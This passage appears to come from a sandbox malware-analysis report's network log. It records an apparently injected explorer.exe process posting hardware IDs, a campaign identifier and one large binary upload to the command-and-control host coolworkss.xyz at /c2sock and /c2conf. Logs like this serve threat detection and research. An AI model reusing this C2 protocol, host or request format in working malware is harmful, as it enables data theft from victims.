                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:03:04.133985043 CEST2867OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:03:04.532296896 CEST2868INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:03:04 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=0pnhd9tu7n4d9mo3juefkqsijh; expires=Sat, 30 Dec 2023 04:49:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sY2tOp6jsRecML4YMCHBMpZfg1hofb4moNbxj70MP9bBoluYUxA%2BunKg%2B6wIqAEApkC9k%2FJTdTia8OAle7pgDNsJK9xGfiAAm7t8f0r%2FJYavvb9%2FfS4oo2W3K8sGCHqd5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfbcb3df92281-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:03:04.532325983 CEST2868INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    34192.168.2.449768104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:03:04.987086058 CEST2868OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:03:04.988643885 CEST2869OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:03:05.386718988 CEST2870INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:03:05 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=6d4aqse7cjcev5sc0iih88sug0; expires=Sat, 30 Dec 2023 04:49:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NC2nuUO%2FPgtX3vc5VATxgGa0c5TzuYgTkxq8cuNSPZwT2Q0qHdrUuZeSDRj1ZS89K7coXrIYjo3h9QR7KxBb6lEZ5lLv6EyzkuYfQQ9tgG%2Bmq935qxnBzfsk2WGHDoVbow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfbd0987667c9-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:03:05.386756897 CEST2870INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    35192.168.2.449769172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:03:06.024326086 CEST2871OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:03:06.025150061 CEST2871OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:03:06.424838066 CEST2872INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:03:06 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=mp890ta9v6l7eknrolh8485oru; expires=Sat, 30 Dec 2023 04:49:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9TaZWJnNAH4CJID0UyiKocqyT%2BrjTlLkvUHOlWyLF%2BkYLljOJW5sbHEREoCN3mQlnMbO3vdiBakKx7Q4%2BCo6MrQ3psTpFox4LaF2ATjUxG2vDdxWsCIP6VAFzhfcYdr3LQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfbd70ea93359-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:03:06.424885035 CEST2872INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    36192.168.2.449770104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:03:07.853878021 CEST2873OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:03:07.854650021 CEST2873OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:03:08.239799976 CEST2874INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:03:08 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=ejbedjltm0lrhg96j274kke78s; expires=Sat, 30 Dec 2023 04:49:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WU%2Bfmfn0sa3ftNCt5dn68Rz8MxkU8xL0JiRZR2BM0RCnPR95FWUJmlfR7%2Bm9ob75olVNZDNzTPjKwutFrpt2vrq4T7JNDd7wpZKNNnqsVzAeKHtxrAxFhYyTwbGUVsJhOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfbe278c26dc8-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:03:08.239861965 CEST2874INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    37192.168.2.449771104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:03:08.559906006 CEST2875OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:03:08.560960054 CEST2875OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:03:08.966351986 CEST2876INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:03:08 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=n2kt6j521vfpf56e35s06ag24c; expires=Sat, 30 Dec 2023 04:49:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2EGC1XGwfI%2Fbb0EqDhKjD6QZZwggZeFcHiKS7%2FxVQ1zsTFFakOZEF08twCglCktzlPYjB%2FfaPLsXJA980iAzgOeEyjthHx87YjyA%2BXhfn5tQqazkQGWP8jdi%2BFAfDAbpdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfbe6e88f8dd9-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:03:08.966384888 CEST2876INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    38192.168.2.449772172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:03:09.257374048 CEST2877OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:03:09.259506941 CEST2878OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:03:09.704988956 CEST2879INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:03:09 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=v67564ktlgd3l0n89ll2usqhvj; expires=Sat, 30 Dec 2023 04:49:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZfmwxFfZAL%2BZtmsN6Fa7tbN0bCVZyE01OPgGC5bu1v1xuZE7VbktxBQOWHoNbqPjYoW1PPdPm3srtpucdgD590aj1O2B472%2FFgDO1DmCt7fLXX0UMOHeb9qJqeK%2Bb1zOuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfbeb49d12206-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:03:09.705065012 CEST2879INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    39192.168.2.449773172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:03:10.610208988 CEST2879OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 735829
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:03:10.612934113 CEST2891OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:03:10.738908052 CEST2892OUTData Raw: b2 b3 a2 9c 29 8b 55 65 e5 57 17 eb 62 7f 67 5f 1e b2 9c eb 24 ad 5c c2 0a b3 ca 63 e5 29 7a c0 34 fe 97 96 67 cb ff 5a eb 87 89 be 4f 18 9f f0 3d 4b ff 27 cb 65 bd a4 ab b2 9f 44 9f 76 41 c5 3e ed 7c f0 11 8a be 87 fe b8 30 2f a0 ea 0c e4 8f e3
                                                                                                                                                    Data Ascii: )UeWbg_$\c)z4gZO=K'eDvA>|0/!/x~$q`:fh8n{II_kdc_^o8bq'_=B'"om/c_kI}^~R,8vq!Y1=N@N
                                                                                                                                                    Sep 5, 2023 13:03:10.741369963 CEST2895OUTData Raw: 0f 26 ba 32 f5 fd 65 76 65 f1 25 6e 07 c8 4f ac 76 83 bc 84 cf ad 9c 0f d1 7f 09 83 53 16 c4 fb d6 76 79 e6 19 7f 1c a6 f5 5d 67 09 6e 45 fa 2b 61 7f da 1f 47 3e 25 fa 33 d9 46 7c 50 85 f9 c9 f7 17 3c f7 d9 ee bb 91 0f 70 d5 fe 3f 32 42 6e f3 b9
                                                                                                                                                    Data Ascii: &2eve%nOvSvy]gnE+aG>%3F|P<p?2Bni_F[.129*cGF~mX1=SCv'1|%CC':4\YF"em?CLyx6L+oX60@^a
                                                                                                                                                    Sep 5, 2023 13:03:10.741532087 CEST2897OUTData Raw: e4 67 7e d1 ed 7b d8 35 ee 8a cb ef 77 bf fd cc d9 01 ef 3b 28 b0 8d a1 dd 43 76 ef 5f 1d e2 1e f9 d9 7f b8 9f 6f ff 9d db f3 7b 8f 4e 59 c0 ff c4 76 fb e2 4d 5d ec 92 d9 16 32 4d e4 57 c8 b6 90 4f 21 a7 93 3a 48 f8 e7 1a 6c 8f 4d d3 e2 7a 8c 17
                                                                                                                                                    Data Ascii: g~{5w;(Cv_o{NYvM]2MWO!:HlMz/+d<sY|PD}bZm+{:~%Mu,637>?tdx.@_-'4\cif81'}<AO6
                                                                                                                                                    Sep 5, 2023 13:03:10.741616964 CEST2905OUTData Raw: ff f1 1c d7 ff 44 c1 eb 3f 7a 4f 62 5e ff 13 e9 d7 7f a7 7f 59 ee fa 97 3f 64 7a e8 c3 ad cb 95 73 ea 6f 7e e7 a2 79 e9 b6 ca ff 2c a6 87 79 c5 6d 7b c1 dc 2e 06 8c 5a 56 59 ef fb cb cb ff ac 36 a3 f5 67 cd 81 aa e9 f4 f9 91 77 1c 7b e1 85 17 ba
                                                                                                                                                    Data Ascii: D?zOb^Y?dzso~y,ym{.ZVY6gw{>-_<xysr1@I#ieV[ZkU^g\?{|Ogog><8WY1]wcpby8v3?Z~^:s.}Ke|xl?;
                                                                                                                                                    Sep 5, 2023 13:03:10.741657972 CEST2910OUTData Raw: 1e 6b 00 ad 73 82 e7 94 f9 1e fb 77 73 8c 0f e6 c7 56 fe cc 72 99 53 ea 3a d5 06 c6 6d 41 59 20 5c 03 3d d5 e4 7a de 51 58 f7 30 bc 2f d5 ad c9 f3 e9 09 39 4f 7e 6e 58 cf 09 9e 7f 56 9f 65 9a 76 01 c5 75 d2 79 30 58 4b 6f c5 f1 e0 ef 85 35 f9 f3
                                                                                                                                                    Data Ascii: kswsVrS:mAY \=zQX0/9O~nXVevuy0XKo5Jj&z&/va{y>ZChKr^x<oZ/VWcir'sWt|)s^P9SaKZkOLzAe<y<n$_g-/G
                                                                                                                                                    Sep 5, 2023 13:03:10.741765976 CEST2915OUTData Raw: 53 06 58 37 ff e3 eb e9 68 e2 7f cc 00 7d fc 2f eb 1e 84 fc 2f 64 80 4d b0 bf 1e f0 bf 2c 2b ab ab 2b aa 0d ec 35 f7 b3 c6 ea 83 c8 1f 9a e0 7f d6 f6 4d f1 bf aa 0c b0 df e3 a2 ac b1 46 56 9a a6 c6 37 ba 7c 10 f8 5f e8 93 b3 d4 8e a1 ed bb be 9a
                                                                                                                                                    Data Ascii: SX7h}//dM,++5MFV7|_ZW eY,)Oy=lo]<X+^Eo__%x[ZE2akWN\8 scmY|xky[7$J0DM?]
                                                                                                                                                    Sep 5, 2023 13:03:10.867651939 CEST2918OUTData Raw: d7 4f 65 17 a2 c1 d2 4f d1 f2 29 4b 62 fe a7 cb df 7d a4 68 9c ae 0a 58 cc e6 90 33 88 ee 49 d9 83 70 81 0e 0b e8 e8 05 b5 bc ac 27 d4 b9 03 8f 9d 3d 12 b3 0a e4 65 ba 5e 8f 4d 97 09 bf ab 9b ff 09 93 91 bc d5 a7 54 74 5a 2f 1e c9 57 d6 b4 3a c7
                                                                                                                                                    Data Ascii: OeO)Kb}hX3Ip'=e^MTtZ/W:PWL`Qs_0a.%LK,[l*Jr_s\nIJ/':ok(>RF:SGxiyn_4T/z^,<_3YY
                                                                                                                                                    Sep 5, 2023 13:03:10.869885921 CEST2921OUTData Raw: 7e ea f8 d4 3c 82 da c6 96 47 6d 6c aa 0d 4d b5 51 3c 2f b2 5c e6 51 2c a2 fb db 2f a8 43 b1 3d 17 05 d7 ce 44 77 db 90 6b 6b 6d 54 c6 bd a2 76 e6 be 7a 86 3b fb 2b 2e 3e 57 f2 fb b4 f3 ae 0a bf 6b 7b 91 f3 f7 ea 20 8d 96 5b af 47 8d 69 a2 d7 e9
                                                                                                                                                    Data Ascii: ~<GmlMQ</\Q,/C=DwkkmTvz;+.>Wk{ [Gi%v=hR7k}p4?][lA%W<R|ek6;9)Uk{ooiqwW9*m);(Rj2kV<soZ8e$*
                                                                                                                                                    Sep 5, 2023 13:03:10.869887114 CEST2923OUTData Raw: 7a c8 3d 65 e3 86 80 c7 04 0c a7 00 4f 42 26 63 71 9a ac 7c aa 32 be 2c db 7d f9 44 97 ed b1 7c 41 c7 56 80 2d 27 8b 97 4f a4 da 9e 2b f2 d9 a0 f3 bf 3d 26 17 ba 23 8e fc 8e 5b b6 de f5 c5 0e 39 f4 eb 6e ef a5 eb fb ce ff f2 5a de f3 be 57 60 7b
                                                                                                                                                    Data Ascii: z=eOB&cq|2,}D|AV-'O+=&#[9nZW`{\P&Rc2/-kZ#jNm'2w-V*<`oz\6DU4/K?knXm=q^_9h?
                                                                                                                                                    Sep 5, 2023 13:03:12.624473095 CEST3631INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:03:12 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=4meofcau51uqip1gvn20m622s3; expires=Sat, 30 Dec 2023 04:49:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FvvODimDzdvqeFI5Z%2FpMklwrC5xTYjbkIECx%2FOc%2BgqDtYLEvwYEa%2FJ6TLNwOKUY3c92g8gQPvGnvmfBj5SJw5XLXBvU%2B862mqIOmhFOYwfTgZ4r4tkMCSN%2BggEi4EXpwRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfbf3b9b14958-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:03:12.624550104 CEST3631INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    4192.168.2.449738172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:23.880969048 CEST2760OUTPOST /c2conf HTTP/1.1
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Content-Length: 36
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 6c 69 64 3d 69 4f 71 70 49 71 2d 2d 50 65 74 74 65 72 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30
                                                                                                                                                    Data Ascii: lid=iOqpIq--Petter&j=default&ver=4.0
                                                                                                                                                    Sep 5, 2023 13:02:24.302586079 CEST2761INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:24 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=q8b2qbhfdelr729iqmf1kqcruv; expires=Sat, 30 Dec 2023 04:49:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=keFWhFVjxJEVWnw5PdlzAzrx7jvtifTQL%2BGq6Prpumn5%2Fi5M9jtsRXMPz8LSgL81hcdKBEMGckyn5XYOWnb5XNfBIAVgc8ooNFBa50cbaXcRupxpQeHSGBzTabrAD%2BhDZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfacfafa19ab4-MIA
